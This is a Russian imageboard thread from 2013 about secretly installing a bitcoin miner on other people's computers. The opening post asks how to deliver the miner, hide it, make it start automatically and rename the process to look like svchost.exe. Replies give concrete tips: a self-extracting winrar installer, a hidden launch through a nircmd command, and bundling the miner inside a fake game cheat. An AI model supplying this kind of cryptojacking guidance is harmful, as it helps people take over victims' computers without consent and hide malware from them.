Как залить биткоин майнер на хомяков?
скачать через wget, ок.
А как быть если там инсталлер, или папка с файлами? Использовать зип архив? Какими командами потом его распаковать? И куда надёжнее всего его ложить чтобы не спалили?
Еще надо-бы его прописать в автозагрузку, а то какой профит тогда. Как это сделать?

ЗЫ, всё это дело конечно будет запускаться в скрытом режиме, да?
Алсо как можно изменить имя майнера в диспетчере задач чтобы ок не палился как какой-нибудь miner.exe а стал например svchost.exe или каким-нибудь WinLogon.exe?

Аноним Вск 19 Май 2013 03:01:50  #248 №43476 

>>43475
Биткоены он майнить собрался, охлол.

Аноним Вск 19 Май 2013 10:47:29  #249 №43479 

>>43475
>если там инсталлер, или папка с файлами
Посмотри в хелпе команды takefiles и takedir, однако лучше всего было бы тебе сделать собственный инсталлер (например, winrar/sfx), который бы был единым файлом и при запуске устанавливал как надо тебе.
>запускаться в скрытом режиме
Можешь попробовать запускать через nircmd командой "nircmd.exe exec hide C:\miner\miner.exe", например. В любом случае, проверь на виртуалке неоднократно.

Аноним Вск 19 Май 2013 14:05:34  #250 №43482 

>>43476
Почему-бы и нет?

Аноним Вск 19 Май 2013 17:38:43  #251 №43488 

>>43482
Потому что выхлоп уже копеек 10 в день с хомяка. Иди лучше в диабле золото майни, повыгоднее будет.

Аноним Вск 19 Май 2013 20:34:55  #252 №43501 

>>43488
Смотри, десять хомяков - уже рупь. А это в месяц тридцатка. Бутылка пива ёпта!

Аноним Вск 19 Май 2013 20:53:31  #253 №43502 

>>43501
А нихуя, через месяц будет уже не 10 копеек, а две. Энтропия сложность растёт.

Аноним Пнд 20 Май 2013 10:11:12  #254 №43507 

Если настроить майнер под GPU и прикрутить личинку к какому нибудь Battlefield 3 Hack всё норм будет.

Аноним Пнд 20 Май 2013 10:48:42  #255 №43508 

>>43507
Похуй, везде одни печи. Все ати шахтёры скупили.

comments powered by Disqus

Отзывы и предложения